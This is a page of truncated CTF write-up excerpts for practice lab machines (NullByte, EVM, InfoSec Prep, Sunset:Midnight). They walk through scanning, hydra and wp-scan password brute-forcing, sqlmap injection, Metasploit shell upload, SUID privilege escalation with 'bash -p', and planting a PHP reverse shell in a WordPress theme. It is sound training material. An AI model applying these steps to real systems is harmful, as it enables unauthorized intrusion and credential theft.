All about CTF writeups

Here's my solution for NullByte:1 The Machine can be downloaded from here. Nmap Scanning for all TCP ports. $ nmap -sC -sV -p- 192.168.1.142 We find 4 ports open. Enumeration Browsing the web and checking the source did not reveal any hint.     But we observe there is an image, lets download this image and check if we can get any information. $ wget http://192.168.1.142/main.gif $ exiftool main.gif $ strings main.gif We find- kzMb5nVYJw as a hint, which is a directory. Browsing http://192.168.1.142/kzMb5nVYJw/ and checking the source give us the hint- that the key is simple.   Using hydra to brute force. $ hydra -P /usr/share/wordlists/rockyou.txt 192.168.1.142 http-form-post "/kzMb5nVYJw/:key=^PASS^:invalid key" -la   We get the password as- elite After entering the key, we are landed to /kzMb5nVYJw/index.php Here we enter a random name- root, and we observe the URL, the parameter- usrtosearch= is vulnerable to SQL Injection. We use sqlmap, to enumerate databases. $...

Here's my solution for EVM:1 The machine can be downloaded from  here. Nmap Scanning for all TCP open ports. nmap -sC -sV -p- 192.168.1.107 We find 6 ports open. Directory Scanning Browsing the web, gives us the hint as- /wordpress. Using dirb for directory scanning. dirb -u http://192.168.1.107 -r Dirb, also finds the /wordpress directory, we can guess it is built on CMS- Wordpress. Using wp-scan, to find all the plugins and users. wp-scan --url http://192.168.1.107/wordpress -e ap,u   No plugins were found, but we found a user- c0rrupt3d_brain. Lets brute force to find the password for the found user. wp-scan --url http://192.168.1.107/wordpress -U c0rrupt3d_brain -P /usr/share/wordlists/rockyou.txt   We find the password as- 24992499. Getting Access As we have the credentials- User: c0rrupt3d_brain Password: 24992499 We use metasploit, to get the initial access. sudo msfconsole use exploit/unix/webapp/wp_admin_shell_upload   We set the required details and then r...

Here's my solution for InfoSec Prep: OSCP The Machine can be downloaded from here. Nmap Lets start by scanning for all TCP Ports. nmap -sC -sV -p- 192.168.1.109 We find 3 open ports. Directory Scan Browsing the web, reading the post, posted by admin gives the hint that- there is only one user on this box "oscp". Using dirb to scan the directories, dirb http://192.168.1.109 -r Checking the /robots.txt, shows up a file- secret.txt, which contains base64 encoded ssh key for the user- oscp. Browsing Cyberchef to decode the base64 encoded ssh key, copy the output and save it. Getting Access Before accessing ssh, we change the file permission for the ssh key file. chmod 600 key ssh -i key oscp@192.168.1.109 Privilege Escaltion We check for SUID bits. find / perm -u=s -type f 2>/dev/null Executing, bash -p The Flag

Here's my solution for Sunset:Midnight. The machine can be downloaded from here. Nmap Scanning for all TCP ports. nmap -sC -sV -p- 192.168.1.107 We find 3 open ports. Enumeration Lets map the IP to host name- sunset-midnight, in the /etc/hosts file. Browsing the web and checking the source, did not give us any hint, but we find that it is built on CMS- Wordpress. Brute forcing Mysql on port 3306. We get the password as- robert Accessing Mysql. On our machine, we create a password as- admin On target machine, we change the password for user- admin. Now we have the credentials as- User: admin Password: admin We browse the /wp-login.php page and login as- admin. Navigate to Appearance > Theme Editor, and select the theme as- Twenty Nineteen. We select 404 Template, to place our php reverse shell payload. Getting Access To run the exploit we browse http://sunset-midnight/wp-content/themes/twentynineteen/404.php And on the other hand we start the netcat listener. We have a reverse sh...